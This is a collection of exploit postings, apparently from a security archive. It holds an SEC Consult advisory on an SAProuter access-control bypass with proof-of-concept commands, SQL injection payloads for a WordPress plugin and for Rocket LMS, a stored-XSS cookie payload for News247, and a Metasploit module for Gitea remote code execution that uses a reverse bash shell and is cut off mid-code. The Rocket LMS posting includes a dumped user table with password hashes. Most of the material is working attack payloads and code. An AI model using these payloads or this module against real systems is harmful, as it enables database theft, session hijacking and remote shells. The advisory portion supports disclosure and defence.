<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220914-0 ><br />=======================================================================<br /> title: Improper Access Control<br /> product: SAP® SAProuter<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3158375<br /> CVE number: CVE-2022-27668<br /> impact: high<br /> homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html<br /> found: 2022-02-25<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAProuter is a software application that provides a remote connection<br />between our customer's network and SAP. SAProuter can be used to:<br /><br />- Improve network security, e.g.by using a password or by only allowing<br /> encrypted connections from known sources<br />- Control and log the connections to your SAP system<br />- Set up an indirect connection when programs involved cannot<br /> communicate with each other due to the network configuration<br />- Increase performance and stability by reducing the SAP system workload<br /> within a local area network (LAN) when communicating with a wide area<br /> network (WAN)" [1]<br /><br />[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends to implement the security note 3158375, where the<br />documented issue is fixed according to the vendor. We advise installing the<br />correction as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Improper Access Control (CVE-2022-27668)<br />According to SAP note 1853140: "in the default configuration, the<br />SAProuter does not allow a route to itself. You can explicitly permit<br />the 'loopback' from the SAProuter to itself using option -X".<br /><br />It has been identified that under certain circumstances, this is not<br />valid and may lead to unexpected behavior. External attackers having<br />network-wise access to a (weakly configured) SAProuter instance can<br />exploit an improper access control vulnerability by sending packets<br />of type NI_ROUTE in order to establish a tunnel that allows to manage<br />the SAProuter externally even when it was started without option -X.<br /><br />This enables an attacker to send packets of type ROUTER_ADM in order to<br />gain unauthorized access to administrative functions such as stopping<br />the remote SAProuter instance, displaying connection information,<br />switching trace level, or terminating a specific connection.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Improper Access Control (CVE-2022-27668)<br />For successful exploitation of this vulnerability, the following prerequisites<br />must be met:<br /><br />- Route permission table saprouttab must contain an entry that<br /> explicitly permits external hosts to connect to port 3299 of<br /> arbitrary hosts. Some examples of such entries are shown in<br /> the following listing:<br /><br /> P <source-host incl. attacker-controlled machine> * 3299<br /> P <source-host incl. attacker-controlled machine> * 3200.3300<br /><br />- SAProuter is running (option -X does not need to be set) and the<br /> attacker has network-wise access to its listening port.<br /><br />The vulnerability can be verified by means of the publicly available<br />Python script router_portfw.py [2] of the open source pysap framework<br />developed by M. Gallo. The script, which is based on a scapy re-implementation<br />of the proprietary SAP Router protocol, allows for port forwarding through<br />a SAProuter service.<br /><br />For demonstration purposes, the following simplified lab setup is used:<br /><br />-------------------------------------------------------------------------<br />SAProuter (IPv4:192.168.56.103) <-----> Attacker (IPv4:192.168.56.104)<br />-------------------------------------------------------------------------<br />SAProuter started with option -r: | Pysap framework<br />./saprouter -r |<br /> |<br />Content of saprouttab in workdir: |<br />P 192.168.56.104 * 3299 |<br />-------------------------------------------------------------------------<br /><br />The following listing shows that it is not possible to establish a<br />"loopback" tunnel through the remote SAProuter service by specifying a<br />target destination host 127.0.0.1 (option -t) and target destination<br />port 3299 (option -r). As expected, this route is filtered and denied<br />by default even when explicitly allowed through the route permission<br />table.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299<br />-t 127.0.0.1 -r 3299 -a 127.0.0.1 -l 3299 -v<br />[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.<br />56.103:3299 (talk mode raw)<br />SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:<br />3299<br />Routing to 127.0.0.1:3299<br />To send 61 bytes data + 4 bytes NI header<br />Received 4 bytes NI header, to receive 211 bytes data<br />Received 211 bytes data<br />Route request to 127.0.0.1:3299 not accepted by 192.168.56.103:3299<br />--------------------------------------------------------------------------<br /><br />It was discovered that it is possible to circumvent this check using<br />the non-standard IPv4 broadcast address 0.0.0.0 (see RFC5735, RFC1122).<br />When specifying destination host 0.0.0.0 and destination port 3299,<br />this leads to an effective access control bypass as can be seen in the<br />following listing.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299<br />-t 0.0.0.0 -r 3299 -a 127.0.0.1 -l 3299 -v<br />[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.<br />56.103:3299 (talk mode raw)<br />SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:<br />3299<br />Routing to 0.0.0.0:3299<br />To send 59 bytes data + 4 bytes NI header<br />Received 4 bytes NI header, to receive 8 bytes data<br />Received 8 bytes data<br />Route request to 0.0.0.0:3299 accepted by 192.168.56.103:3299<br /><br />attacker@192.168.56.104$ ss -antlp | grep "3299"<br />LISTEN 0 5 127.0.0.1:3299 0.0.0.0:* users:(("python",pid=1985,fd=3))<br />--------------------------------------------------------------------------<br /><br />Once the tunnel is established, an attacker can leverage administrative<br />functions using its local port 3299 which is forwarded to the loopback<br />interface of the remote SAProuter instance. For example, the Python<br />script router_admin.py [3] of the pysap framework can be used to<br />shutdown (option -s) the running SAProuter instance on the remote host.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_admin.py -s -d 127.0.0.1 -p 3299<br />[*] Requesting stop of the remote SAP Router<br />[*] Connected to the SAP Router 127.0.0.1:3299<br />[*] Using SAP Router version 40<br />[*] Sending Router Admin packet<br /><br /><br />netwadm@192.168.56.103$ ./saprouter -r<br /><br />trcfile dev_rout<br />no logging active<br /><br />WARNING: wildcard character used in route target<br /><br />shutdown message received, good bye ...<br />--------------------------------------------------------------------------<br /><br />External links:<br />[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py<br />[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the binary were found to be vulnerable during our tests:<br /><br />- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)<br />- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)<br /><br />No additional testing on other releases has been carried out. According to the vendor<br />the following releases and versions are affected by the discovered vulnerability:<br /><br />- KRNL64NUC 7.49 <br />- KRNL64UC 7.49 <br />- SAP_ROUTER 7.53 <br />- SAP_ROUTER 7.22 <br />- KERNEL 7.49 <br />- KERNEL 7.77 <br />- KERNEL 7.81 <br />- KERNEL 7.85 <br />- KERNEL 7.86 <br />- KERNEL 7.87 <br />- KERNEL 7.88<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-25: Contacting vendor through vulnerability submission web form.<br />2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.<br />2022-04-04: Requesting status update.<br />2022-04-05: Vendor confirms vulnerability and states that a fix is already<br /> complete. The corresponding security note is expected to be<br /> released with the upcoming April 2022 patch day.<br />2022-04-12: Patch day April 2022 passed without release.<br />2022-05-10: Patch day May 2022 passed without release.<br />2022-06-14: Vendor releases patch with SAP Security Note 3158375.<br />2022-06-14: Requesting confirmation that the finding was fixed by the<br /> published security note as no prior notification was provided.<br />2022-06-28: Vendor confirms that the patch included in Security Note 3158375<br /> fixes the issue. The vulnerability got assigned CVE-2022-27668.<br />2022-09-14: Release of this security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />The software can be obtained via the SAP service marketplace. Further<br />information can be found in the corresponding Security Note 3158375 [4].<br /><br />[4] https://launchpad.support.sap.com/#/notes/3158375<br /><br /><br />Workaround:<br />-----------<br />Remove any wildcard (*) values in the target host or IP address directive<br />in route permission table saprouttab entries 'P' and 'S'. In general, it<br />is recommended to not make use of any wildcard values in the route permission<br />table saprouttab. Additional information on the secure configuration of<br />SAProuter can be found in SAP Security Note/KBA 1895350 [5].<br /><br />[5] https://launchpad.support.sap.com/#/notes/1895350<br /><br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2022<br /><br /></code></pre>
<pre><code>## Title: Social Share Buttons-2.2.3 SQLi<br />## Author: nu11secur1ty<br />## Date: 09.16.2022<br />## Vendor: https://wordpress.org/<br />## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3<br /><br /><br />## Description:<br />The `project_id` parameter from the Social Share Buttons-2.2.3 system<br />appears to be vulnerable to SQL injection attacks.<br />The malicious user can dump-steal the database, from this system and<br />he can use it for very malicious purposes.<br />WARNING: The attacker can retrieve all-database from this system!<br />NOTE: The users of this system are NOT protected, this SQL<br />vulnerability is CRITICAL!<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br /><br />```mysql<br />---<br />Parameter: project_id (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: action=social-sharing-share&project_id=378116348' or<br />'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=social-sharing-share&project_id=378116348' or<br />'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND<br />'KWbC'='KWbC&network_id=5&post_id=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/m9r76w)<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : rocket-soft.org │ │ Rocket LMS - Learning Management System │<br />│ Vendor : RocketSoft │ │ │<br />│ Software : Rocket LMS v 1.6 │ │ is an online course marketplace with a │<br />│ Vuln Type: Remote SQL Injection │ │ pile of features that helps you to run │<br />│ Method : GET │ │ your online education business easily │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL <br /> Ivo @palaziv<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'min_age' is vulnerable<br /><br />---<br />Parameter: min_age (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br />---<br /><br /><br />GET parameter 'max_age' is vulnerable<br /><br />---<br />Parameter: max_age (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=<br />--- <br /> <br /><br />[+] Starting the Attack<br /><br />[INFO] fetching current database<br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2, PHP 7.4.30<br />back-end DBMS: MySQL >= 5.6<br /><br />current database: 'admin_learn'<br /><br /><br />[INFO] fetching tables for database: 'admin_learn'<br /><br />Database: admin_learn<br />[184 tables]<br />+------------------------------------------------+<br />| groups |<br />| accounting |<br />| advertising_banners |<br />| advertising_banners_translations |<br />| affiliates |<br />| affiliates_codes |<br />| agora_history |<br />| badge_translations |<br />| badges |<br />| become_instructors |<br />| blog |<br />| blog_categories |<br />| blog_translations |<br />| bundle_filter_option |<br />| bundle_translations |<br />| bundle_webinars |<br />| bundles |<br />| cart |<br />| categories |<br />| category_translations |<br />| certificate_template_translations |<br />| certificates |<br />| certificates_templates |<br />| comments |<br />| comments_reports |<br />| contacts |<br />| course_forum_answers |<br />| course_forums |<br />| course_learning |<br />| course_noticeboard_status |<br />| course_noticeboards |<br />| delete_account_requests |<br />| discount_categories |<br />| discount_courses |<br />| discount_groups |<br />| discount_users |<br />| discounts |<br />| faq_translations |<br />| faqs |<br />| favorites |<br />| feature_webinar_translations |<br />| feature_webinars |<br />| file_translations |<br />| files |<br />| filter_option_translations |<br />| filter_options |<br />| filter_translations |<br />| filters |<br />| follows |<br />| forum_featured_topics |<br />| forum_recommended_topic_items |<br />| forum_recommended_topics |<br />| forum_topic_attachments |<br />| forum_topic_bookmarks |<br />| forum_topic_likes |<br />| forum_topic_posts |<br />| forum_topic_reports |<br />| forum_topics |<br />| forum_translations |<br />| forums |<br />| group_users |<br />| groups_registration_packages |<br />| home_sections |<br />| jazzcash_transactions |<br />| meeting_times |<br />| meetings |<br />| migrations |<br />| navbar_button_translations |<br />| navbar_buttons |<br />| newsletters |<br />| newsletters_history |<br />| noticeboards |<br />| noticeboards_status |<br />| notification_templates |<br />| notifications |<br />| notifications_status |<br />| offline_payments |<br />| order_items |<br />| orders |<br />| page_translations |<br />| pages |<br />| password_resets |<br />| payku_payments |<br />| payku_transactions |<br />| payment_channels |<br />| payouts |<br />| payu_transactions |<br />| permissions |<br />| prerequisites |<br />| product_categories |<br />| product_category_translations |<br />| product_discounts |<br />| product_faq_translations |<br />| product_faqs |<br />| product_file_translations |<br />| product_files |<br />| product_filter_option_translations |<br />| product_filter_options |<br />| product_filter_translations |<br />| product_filters |<br />| product_media |<br />| product_orders |<br />| product_reviews |<br />| product_selected_filter_options |<br />| product_selected_specification_multi_values |<br />| product_selected_specification_translations |<br />| product_selected_specifications |<br />| product_specification_categories |<br />| product_specification_multi_value_translations |<br />| product_specification_multi_values |<br />| product_specification_translations |<br />| product_specifications |<br />| product_translations |<br />| products |<br />| promotion_translations |<br />| promotions |<br />| purchases |<br />| quiz_question_translations |<br />| quiz_translations |<br />| quizzes |<br />| quizzes_questions |<br />| quizzes_questions_answer_translations |<br />| quizzes_questions_answers |<br />| quizzes_results |<br />| rating |<br />| regions |<br />| registration_packages |<br />| registration_packages_translations |<br />| reserve_meetings |<br />| rewards |<br />| rewards_accounting |<br />| roles |<br />| sales |<br />| sales_log |<br />| sections |<br />| session_reminds |<br />| session_translations |<br />| sessions |<br />| setting_translations |<br />| settings |<br />| special_offers |<br />| subscribe_reminds |<br />| subscribe_translations |<br />| subscribe_uses |<br />| subscribes |<br />| support_conversations |<br />| support_department_translations |<br />| support_departments |<br />| supports |<br />| tags |<br />| testimonial_translations |<br />| testimonials |<br />| text_lesson_translations |<br />| text_lessons |<br />| text_lessons_attachments |<br />| ticket_translations |<br />| ticket_users |<br />| tickets |<br />| trend_categories |<br />| users |<br />| users_badges |<br />| users_cookie_security |<br />| users_manual_purchase |<br />| users_metas |<br />| users_occupations |<br />| users_registration_packages |<br />| users_zoom_api |<br />| verifications |<br />| webinar_assignment_attachments |<br />| webinar_assignment_history |<br />| webinar_assignment_history_messages |<br />| webinar_assignment_translations |<br />| webinar_assignments |<br />| webinar_chapter_items |<br />| webinar_chapter_translations |<br />| webinar_chapters |<br />| webinar_extra_description_translations |<br />| webinar_extra_descriptions |<br />| webinar_filter_option |<br />| webinar_partner_teacher |<br />| webinar_reports |<br />| webinar_reviews |<br />| webinar_translations |<br />| webinars |<br />+------------------------------------------------+<br /><br /><br />[INFO] fetching columns for table 'users' in database 'admin_learn'<br /><br />Database: admin_learn<br />Table: users<br />[49 columns]<br /><br />+--------------------+-------------------------------------+<br />| Column | Type |<br />+--------------------+-------------------------------------+<br />| language | varchar(255) |<br />| about | text |<br />| access_content | tinyint(1) |<br />| account_id | varchar(128) |<br />| account_type | varchar(128) |<br />| address | varchar(255) |<br />| affiliate | tinyint(1) |<br />| avatar | varchar(255) |<br />| avatar_settings | varchar(255) |<br />| ban | tinyint(1) |<br />| ban_end_at | int(10) unsigned |<br />| ban_start_at | int(10) unsigned |<br />| bio | varchar(128) |<br />| can_create_store | tinyint(1) |<br />| certificate | varchar(128) |<br />| city_id | int(10) unsigned |<br />| commission | int(10) unsigned |<br />| country_id | int(10) unsigned |<br />| cover_img | varchar(255) |<br />| created_at | int(11) |<br />| deleted_at | int(11) |<br />| district_id | int(10) unsigned |<br />| email | varchar(255) |<br />| facebook_id | varchar(255) |<br />| financial_approval | tinyint(1) |<br />| full_name | varchar(128) |<br />| google_id | varchar(255) |<br />| headline | varchar(255) |<br />| iban | varchar(128) |<br />| id | int(10) unsigned |<br />| identity_scan | varchar(128) |<br />| level_of_training | bit(3) |<br />| location | point |<br />| meeting_type | enum('all','in_person','online') |<br />| mobile | varchar(32) |<br />| newsletter | tinyint(1) |<br />| offline | tinyint(1) |<br />| offline_message | text |<br />| organ_id | int(11) |<br />| password | varchar(255) |<br />| province_id | int(10) unsigned |<br />| public_message | tinyint(1) |<br />| remember_token | varchar(255) |<br />| role_id | int(10) unsigned |<br />| role_name | varchar(64) |<br />| status | enum('active','pending','inactive') |<br />| timezone | varchar(255) |<br />| updated_at | int(11) |<br />| verified | tinyint(1) |<br />+--------------------+-------------------------------------+<br /><br /><br />[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'<br /><br />Database: admin_learn<br />Table: users<br />[4 entries]<br /><br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br />| id | account_id | account_type | email | password |<br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br />| 1 | NULL | NULL | admin@demo.com | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |<br />| 867 | NULL | NULL | organization@demo.com | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |<br />| 995 | NULL | NULL | student@demo.com | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |<br />| 1015 | NULL | NULL | instructor@demo.com | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |<br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: News247 - News Magazine (CMS) v1.0 – Stored Cross Site Scripting (XSS) <br /># Exploit Author: Ravinder Verma <br /># Date: Septmeber 14, 2022 <br /># Vendor Homepage: https://www.sourcecodester.com/php/14952/news247-news-magazine-php-script.html <br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/news247.zip <br /># Tested on: Kali Linux, Apache, Mysql <br /># Vendor: 255programmer <br /># Version: v1.0 <br /># CVE [Reserved] : CVE-2021-41731 <br /># Exploit Description:<br /><br /># News247 - News Magazine (CMS) v1.0 suffers from a stored cross site<br />scripting (XSS) Vulnerability. Admin can publish blogs under various<br />categories. When creating new "blog category", if admin give malicious<br />payload like *""><img src=x onerror=alert(document.cookie)>* into the<br />category name field and publish that blog. Then it allows you to execute<br />arbitrary JavaScript in the context of the whole user who visited that<br />page. It can be abused to steal session cookies, perform requests in the<br />name of the victim or for phishing attacks.<br /><br /></code></pre>
<pre><code># Exploit Title: Gitea Git Fetch Remote Code Execution<br /># Date: 09/14/2022<br /># Exploit Author: samguy<br /># Vendor Homepage: https://gitea.io<br /># Software Link: https://dl.gitea.io/gitea/1.16.6<br /># Version: <= 1.16.6<br /># Tested on: Linux - Debian<br /># Ref : https://tttang.com/archive/1607/<br /># CVE : CVE-2022-30781<br /><br />##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gitea Git Fetch Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits Git fetch command in Gitea repository migration<br /> process that leads to a remote command execution on the system.<br /> This vulnerability affect Gitea before 1.16.7 version.<br /> },<br /> 'Author' => [<br /> 'wuhan005 & li4n0', # Original PoC<br /> 'krastanoel' # MSF Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-30781'],<br /> ['URL', 'https://tttang.com/archive/1607/']<br /> ],<br /> 'DisclosureDate' => '2022-05-16',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix win],<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultOptions' => { 'WfsDelay' => 30 },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(3000),<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with']),<br /> OptString.new('PASSWORD', [true, 'Password to use']),<br /> OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/user/login'),<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('No response from the web service') if res.nil?<br /> return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> # Powered by Gitea Version: 1.16.6<br /> unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))<br /> return CheckCode::Unknown('Target does not appear to be running Gitea.')<br /> end<br /><br /> if match[:version].match(/[a-zA-Z]/)<br /> return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/user/login'),<br /> 'vars_post' => {<br /> 'user_name' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Safe('Authentication failed') if res&.code != 302<br /><br /> if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')<br /> return CheckCode::Appears("Version detected: #{match[:version]}")<br /> end<br /><br /> CheckCode::Safe("Version detected: #{match[:version]}")<br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def primer<br /> ['/api/v1/version', '/api/v1/settings/api',<br /> "/api/v1/repos/#{@migrate_repo_path}",<br /> "/api/v1/repos/#{@migrate_repo_path}/pulls",<br /> "/api/v1/repos/#{@migrate_repo_path}/topics"<br /> ].each { |uri| hardcoded_uripath(uri) } # adding resources<br /><br /> vprint_status("Creating repository \"#{@repo_name}\"")<br /> gitea_create_repo<br /> vprint_good('Repository created')<br /> vprint_status("Migrating repository")<br /> gitea_migrate_repo<br /> end<br /><br /> def exploit<br /> @repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"<br /> datastore['URIPATH'] = "/#{@migrate_repo_path}"<br /><br /> Timeout.timeout(datastore['HTTPDELAY']) { super }<br /> rescue Timeout::Error<br /> [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }<br /> cleanup # removing all resources<br /> end<br /><br /> def get_csrf(cookies)<br /> csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last<br /> fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf<br /> csrf<br /> end<br /><br /> def gitea_remove_repo(name)<br /> vprint_status("Cleanup: removing repository \"#{name}\"")<br /> uri = "/#{datastore['username']}/#{name}/settings"<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'keep_cookies' => true<br /> )<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'action' => 'delete',<br /> 'repo_name' => name,<br /> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to remove repository') if res&.code != 302<br /> end<br /><br /> def gitea_create_repo<br /> uri = normalize_uri(target_uri.path, '/repo/create')<br /> res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)<br /> @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'uid' => @uid,<br /> 'auto_init' => 'on',<br /> 'readme' => 'Default',<br /> 'repo_name' => @repo_name,<br /> 'trust_model' => 'default',<br /> 'default_branch' => 'master',<br 